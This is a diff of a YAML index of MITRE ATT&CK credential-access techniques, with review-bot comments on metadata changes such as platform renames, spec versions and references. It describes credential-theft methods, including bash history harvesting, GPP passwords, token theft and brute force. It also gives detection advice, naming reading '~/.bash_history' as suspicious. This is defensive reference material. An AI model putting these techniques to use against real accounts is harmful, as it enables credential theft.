- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46066,25 +46806,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
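Review bot: the `External to DA, the OS X Way` reference swaps the dead `http://www.slideshare.net/StephanBorosh/...` link for `https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418` and bumps the retrieval date to September 12, 2024, but unlike the DHCP and Careto references earlier in this diff it points at the live site rather than a Wayback snapshot; given that the previous slideshare URL already rotted once, the archived form would be the more durable choice. Separately, the unchanged `x_mitre_detection` context still has `.bash_history` and `cat ~/.bash_history` split across lines with a dangling `is` and `.`, the same stripped-markup artefact seen in the T1555.003 detection text.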
@@ -46158,7 +46916,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -46220,11 +46977,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
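Review bot: T1606.001 loses `spec_version: '2.1'` but keeps `x_mitre_attack_spec_version: 3.1.0` and gets no `modified` bump, unlike T1528 directly below it which moves to `'2024-10-14T22:11:30.271Z'`; check whether T1606.001 was actually refreshed from the current bundle or simply had the field stripped.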
@@ -46273,6 +47029,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -46281,6 +47038,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46291,13 +47049,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
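Review bot: T1528 gains `IaaS` as a platform in addition to the `Office Suite` / `Identity Provider` rename, so any per-platform index that enumerates techniques for IaaS must now include T1528 or it will be out of sync with this file; please confirm the IaaS index was regenerated in the same change. The removed `Office 365`, `Azure AD` and `Google Workspace` entries carry the same silent-no-match consequence already noted for T1556.007.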
@@ -46353,44 +47112,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46407,25 +47133,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
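Review bot: `spec_version: '2.1'` is deleted from this object (and from every other object this diff touches) while `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0; that combination is what a sync from a STIX 2.0 bundle instead of the 2.1 bundle produces, so the commit should say which source the generator now reads, and anything that parses these entries as STIX 2.1 needs checking. Two smaller things in the same hunk: `x_mitre_permissions_required: - User` is dropped without replacement (fine if upstream no longer emits it, but any index column fed from it will now be empty), and the T1556.008 `modified` value moves backwards from '2023-10-31T14:00:00.188Z' to '2023-05-04T18:02:51.318Z'. Every `modified` that moves backwards in this diff (T1556.008 here, T1557.002 and T1558.002 later) replaces a value ending in `.188Z`, a suffix several other old timestamps share, which suggests the old values were stamped by the previous generator rather than taken from upstream; if that is the explanation, state it in the commit message so the regression is not mistaken for a bad merge.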
@@ -46500,11 +47255,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46548,11 +47302,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
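Review bot: the platform rename here (`Azure AD`, `Office 365`, `Google Workspace` out; `Office Suite`, `Identity Provider` in) repeats in the T1621, T1552.008, T1212, T1110, T1110.004, T1556.006 and T1556.009 hunks below, and it is the only substantive change in those hunks besides the version bump. Any per-platform index that is built by matching the old platform strings will silently drop these techniques after this sync, so the platform filter in the generator (or whatever documents the index-to-platform mapping) should change in the same commit, and the new `Identity Provider` and `Office Suite` buckets need a home.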
@@ -46576,8 +47329,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
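Review bot: the `GitHub AWS-ADFS-Credential-Generator` reference changes owner, from `github.com/damianh/aws-adfs-credential-generator` to `github.com/pvanbuijtene/aws-adfs-credential-generator`, while the description still reads `Damian Hickey. (2017, January 28)`. A different GitHub owner is normally a fork; confirm the new URL is what upstream ATT&CK cites as of the new `Retrieved September 27, 2024` date and that it still contains the referenced material, since a citation pointing at a fork under another author's name deserves a second look before it is propagated into the index.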
@@ -46593,11 +47346,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46608,11 +47360,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46622,16 +47376,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46669,13 +47423,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46684,6 +47435,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46691,11 +47443,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -46713,13 +47465,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -46732,6 +47481,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -46745,12 +47495,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -46782,17 +47533,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -46865,12 +47613,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46879,6 +47626,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -46897,18 +47645,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -46932,13 +47680,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46964,6 +47709,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -46975,18 +47721,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -47005,14 +47751,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47041,24 +47784,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -47093,13 +47838,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47177,14 +47919,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -47200,6 +47941,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47208,13 +47950,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -47222,15 +47964,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -47241,9 +47979,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -47289,7 +48026,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47308,17 +48045,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
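Review bot: T1557.002 keeps `x_mitre_attack_spec_version: 2.1.0` here (and T1556.008 earlier stays at 3.1.0) while most objects in this diff move to 3.2.0, and in the previous hunk its `modified` goes backwards from '2022-11-08T14:00:00.188Z' to '2022-07-22T18:37:22.176Z'. Mixed spec versions in one index are expected when upstream has not re-released an object, but they mean consumers must cope with both field shapes (with and without `x_mitre_permissions_required`, with and without `x_mitre_deprecated` and `revoked`); that caveat belongs in the index documentation rather than being discoverable only by diffing. The `Azure AD` to `Entra ID` wording change in the T1556.009 description is fine as upstream text, but note the citation names (`Microsoft Conditional Access`) are unchanged, so nothing else needs to follow it.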
@@ -47351,10 +48087,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
